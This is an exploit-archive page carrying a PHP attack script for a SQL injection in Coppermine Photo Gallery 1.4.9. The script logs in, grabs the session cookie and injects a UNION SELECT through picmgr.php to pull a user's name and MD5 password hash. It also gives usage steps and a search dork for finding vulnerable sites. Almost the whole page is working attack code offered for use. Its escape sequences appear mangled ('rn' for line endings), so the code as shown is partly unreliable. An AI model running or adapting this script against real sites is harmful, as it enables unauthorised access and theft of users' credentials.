Coppermine Photo Gallery 1.4.9 Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Coppermine Photo Gallery 1.4.9 Remote SQL Injection Vulnerability
# Published : 2006-10-27
# Author : w4ck1ng
# Previous Title : N/X WCMS <= 4.1 (nxheader.inc.php) Remote File Include Exploit
# Next Title : PHPGiggle 12.08 (CFG_PHPGIGGLE_ROOT) File Include Vulnerability

#!/usr/bin/php
<?php

 /*********************************************************************
 * Coppermine Photo Gallery 1.4.9 Remote SQL Injection Vulnerability 
 * 
 * Note:
 * Requires a valid user account.
 *
 * Usage: 
 * php script.php [host] [path] [table prefix] [user id] [username] [password]
 *
 * Usage Example:
 * php script.php domain.com /coppermine/ cpg149_ 1 john secret
 *
 * Googledork"
 * "Powered by Coppermine Photo Gallery"
 *
 * Credits:
 * Disfigure - Vulnerability research and discovery
 * Synsta - Exploit scripting
 * 
 * [w4ck1ng] - w4ck1ng.com
 *********************************************************************/

if(!$argv[6]){
die("Usage:
php $argv[0] [host] [path] [table prefix] [user id] [username] [password]n
Usage Example:
php $argv[0] domain.com /coppermine/ cpg149_ 1 john secretn");
}

if($argv[6]){

function send($host,$put){
global $data;
$conn = fsockopen(gethostbyname($host),"80");
if(!$conn) {
die("Connection to $host failed...");
}else{
fputs($conn,$put);
}
while(!feof($conn)) {
$data .=fgets($conn);
}
fclose($conn);
return $data;
}

$host = $argv[1];
$path = $argv[2];
$prefix = $argv[3];
$userid = $argv[4];
$userl = $argv[5];
$passl = $argv[6];

$post = "username=".urlencode($userl)."&password=".urlencode($passl)."&submitted=Login";
$req  = "POST ".$path."login.php?referer=index.php HTTP/1.1rn"; 
$req .= "Referer: http://".$host.$path."login.php?referer=index.phprn";
$req .= "Host: $hostrn";
$req .= "Content-Type: application/x-www-form-urlencodedrn";
$req .= "Content-Length: ".strlen($post)."rn";
$req .= "Connection: Closern";
$req .= "Cache-Control: no-cachernrn";
$req .= $post;
send("$host","$req");

/* Borrowed from rgod. */           
$temp = explode("Set-Cookie: ",$data);
$temp2 = explode(" ",$temp[1]);
$cookie = $temp2[0];
$temp2 = explode(" ",$temp[2]);
$cookie .= " ".str_replace(";","",$temp2[0]);
$cookie = str_replace("r","",$cookie);
$cookie = str_replace("n","",$cookie);
            
$sql = urlencode("123 UNION SELECT user_id,user_group,concat(user_name,char(58,58),user_password) FROM ".$prefix."users where user_id = ".$userid." --");
$req =  "GET ".$path."picmgr.php?aid="."$sql HTTP/1.1rn";
$req .= "Host: $hostrn";
$req .= "Content-Type: application/x-www-form-urlencodedrn";
$req .= "Cookie: ".$cookie."rnrn";
$req .= "Connection: Closernrn";
send("$host","$req");

$gdata = explode("<option value="picture_no=1,picture_nm=",$data);
$ghash = explode(",action=0">",$gdata[1]);
$hash = $ghash[0];
$uname = explode("'",$hash);
$uname = explode("::",$uname[1]);
$username = $uname[0];
$fhash = explode("::",$hash);
$fhash = explode("',picture_sort=100",$fhash[1]);
$finalhash = $fhash[0];

if(strlen($finalhash) != 32){ 
die("Exploit failed..n"); 
}else{ 
die("Username: $username MD5: $finalhashn"); 
}
}
?>

# www.Syue.com [2006-10-27]